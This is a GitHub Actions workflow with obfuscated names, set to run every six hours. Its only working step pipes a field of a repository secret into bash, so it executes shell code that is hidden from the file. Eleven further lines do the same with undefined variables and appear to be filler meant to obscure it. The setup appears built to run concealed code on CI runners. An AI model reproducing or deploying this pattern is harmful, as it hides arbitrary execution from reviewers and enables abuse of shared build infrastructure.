name: shici1sc

on:
  workflow_dispatch:
  schedule:
    - cron: '56 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shici1sc
        env:
          z45: ${{ secrets.z45 }}
        run: |
          echo $z45 | jq -r .emck3 | /bin/bash
          echo $rer13848 | jq -r .zy24 | /bin/bash
          echo $lg01468 | jq -r .fv0 | /bin/bash
          echo $d17 | jq -r .cnn726 | /bin/bash
          echo $yd1 | jq -r .rbztz81164 | /bin/bash
          echo $hhizk95 | jq -r .y5805 | /bin/bash
          echo $wnhn34147 | jq -r .qz93 | /bin/bash
          echo $t142 | jq -r .zb3 | /bin/bash
          echo $ljii01495 | jq -r .u388 | /bin/bash
          echo $s02 | jq -r .neffj6162 | /bin/bash
          echo $xasc71 | jq -r .qd8865 | /bin/bash
          echo $chra78071 | jq -r .pap8254 | /bin/bash

